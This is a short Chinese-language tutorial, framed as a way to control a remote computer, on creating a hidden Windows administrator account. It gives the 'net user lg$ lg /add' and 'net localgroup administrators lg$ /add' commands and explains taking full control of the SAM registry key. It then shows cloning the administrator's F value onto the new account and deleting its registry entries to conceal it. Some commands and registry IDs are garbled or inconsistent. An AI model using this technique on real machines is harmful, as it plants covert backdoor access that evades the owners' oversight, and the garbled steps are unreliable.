要想控制远端的计算机,那我想就少不了隐藏用户帐号的问题了,其实创建隐藏用户帐号还是比较简单的,现在我就把创建隐藏用户帐号告诉大家。
步骤
打开注册表:HKEY_LOCAL_MACHINE\SAM\SAM
SAM是保存用户帐号的地方,不过这个“项”在默认情况下是不可见的。我们如果想看内部的内容就必须首先对其授权。注销后可以看到(建议对注册表不是很熟悉的朋友不要随便改动注册表)
点中SAM文件夹---右击---权限---完全控制---添加用户,
认识注册表中的帐号分类
在OS(操作系统)中的用户帐号无论是内置帐号,还是后建帐号,在注册表中都能看见。不过有两个帐号大家一定要能够认识,那就是管理员帐号和guest帐号。
在这个图中”000001fa4”表示的是管理员帐号,即使管理员帐号被重命名了这个值也是不会变的,所以我们可以通过这个值来判断,重命名后的管理员帐号。
还有一种技术叫通过注册表来克隆管理员,其思路就是复制管理员SAM数据库的权限到普通用户。
“000001fa5”表示的是guest帐号,同样这个值也不会因为,来宾帐号给重命名而改变。剩下的其它值基本上就是后来创建的用户帐号,生成值了。认识了注册表后,现在我们就来利用”net user”命令创建帐号了,创建隐藏帐号必须在CMD下。利用这组命令的,如果不熟悉这个命令使用的朋友可以用图形界面操作来创建用户。
利用”net user”命令创建帐号
netuser lg$ lg /add。
这里的意思是说,建立个lg$ 帐户密码是lg
C:\Documents and Settings\Administrator>net localgroup administrators
lg$ /add 这里的意思是说把lg,以便让我们创建用户具备管理员权限。
HKEY_LOCAL_MACHINE\SAM\SAM
找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
这个项,打开”000001f4”项,然后再打开”F”。然后将这里面的值,全选,粘帖并覆盖到”000003ee”F”值.
现在将注册表中的“lg$”、“000003ee”
删除隐藏用户
将注册表中的users和names对应的用户信息删除。